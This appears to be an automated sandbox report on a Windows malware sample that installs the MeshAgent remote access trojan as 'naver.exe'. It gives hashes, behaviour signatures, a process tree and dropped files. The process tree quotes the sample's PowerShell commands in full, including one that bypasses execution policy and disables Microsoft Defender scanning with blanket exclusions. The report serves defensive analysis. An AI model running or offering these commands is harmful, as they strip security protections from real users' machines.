Analysis

  • max time kernel
    92s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20240802-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    24-09-2024 17:40

General

  • Target

    20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe

  • Size

    19.0MB

  • MD5

    e664e32eae75f70aca3b95397beb8706

  • SHA1

    ca649ca8a6f15876d56f7a3491f7435f5b0df8ef

  • SHA256

    d8ae46b6adb3b8dcaddaab2adaf4337048e29c1ffd1caccbe22612dad8113402

  • SHA512

    d522171534431ae1cc9c3536845f3404d89cadbd3e8481ac64c5f3b98b16d0625d6619b00e23e579b575dd99498bd43e6d1b6c07da81839337e9897b901f672a

  • SSDEEP

    393216:ZGbYHohSnaqtvylAjWZ0Xq9YLuxMfCVb2:gbYHPhtvylAjWZ0Xq9YLuxMfCVK

Malware Config

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 64 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe
    "C:\Users\Admin\AppData\Local\Temp\20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:780
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1884
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1260
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2928
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:1644
          • C:\Users\Admin\AppData\Local\naver\naver.exe
            C:\Users\Admin\AppData\Local\naver\naver.exe -install
            5⤵
            • Sets service image path in registry
            • Executes dropped EXE
            PID:3316
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2304
  • C:\Users\Admin\AppData\Local\naver\naver.exe
    "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:2192
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4028
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4336
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2132
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      PID:4808
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:3240
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:1632
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      PID:2244

Network

MITRE ATT&CK Enterprise v15

Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          b1e180583d3525f6534cc1110224a5fb

          SHA1

          b7cadce5826cdbe5b7a16cc6116522e7885882b7

          SHA256

          2e7e0e975fd986c9156ccaf646991dc1f1620e0330ff7b934dbdfd5a7c4567f7

          SHA512

          a8b64bd8c0709ae0440846e98d9e8023506c5fc3228c5a4bb2a5ae29bc310fb7cf833219766a1305b708bd7f1b21d76b3efa1169d5c7ffa09412d2a4bb600752

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          51c690a6fdcba7986fe86d1a9d29b24e

          SHA1

          4e0c6a52271253b9e1445173c72d28a0c6d3b667

          SHA256

          b46eaa6f6f66c744a6baa471a8b37a4992e300b12ad51b234b812d453e3435ae

          SHA512

          ef3c6840e09c92e44c09bc797d164e550ca2ea29170c5768ec0037eabf9fe693bc9a19aca911197acf4b75e1c13877923fb8010346d65b0857c0b61e85a4085b

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tr20rjjv.b5x.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\naver\naver.exe

          Filesize

          5.3MB

          MD5

          2bf9eaf0d2693850c39817b4b797cf43

          SHA1

          e93f0ff794ab20bdda2f81d210f4869823455888

          SHA256

          325502bedbb2a25218b2004535a679a8fe08daf44ad87ebe98db7dc4f3278026

          SHA512

          2b7b6ca1bcffcb5a6007f938186dff14549bde8d8f5e61883525133a083d69812d28a1a41507a38d210283b4766b67442828259f45f7996f9e5beb4784f2166c

        • C:\Users\Admin\AppData\Local\naver\naver.msh

          Filesize

          22KB

          MD5

          2dd515ea546a81398d94dd15e3b4d55c

          SHA1

          eb0b0fca721a296906166b7e972559b87353b726

          SHA256

          becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2

          SHA512

          439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb

        • memory/1884-34-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/1884-23-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/1884-25-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/1884-26-0x000001D1F3170000-0x000001D1F31B4000-memory.dmp

          Filesize

          272KB

        • memory/1884-27-0x000001D1F3440000-0x000001D1F34B6000-memory.dmp

          Filesize

          472KB

        • memory/1884-51-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/1884-33-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/1884-24-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/1884-35-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/2304-1-0x00007FFE03DA3000-0x00007FFE03DA5000-memory.dmp

          Filesize

          8KB

        • memory/2304-22-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/2304-30-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/2304-12-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/2304-11-0x000001E9502D0000-0x000001E9502F2000-memory.dmp

          Filesize

          136KB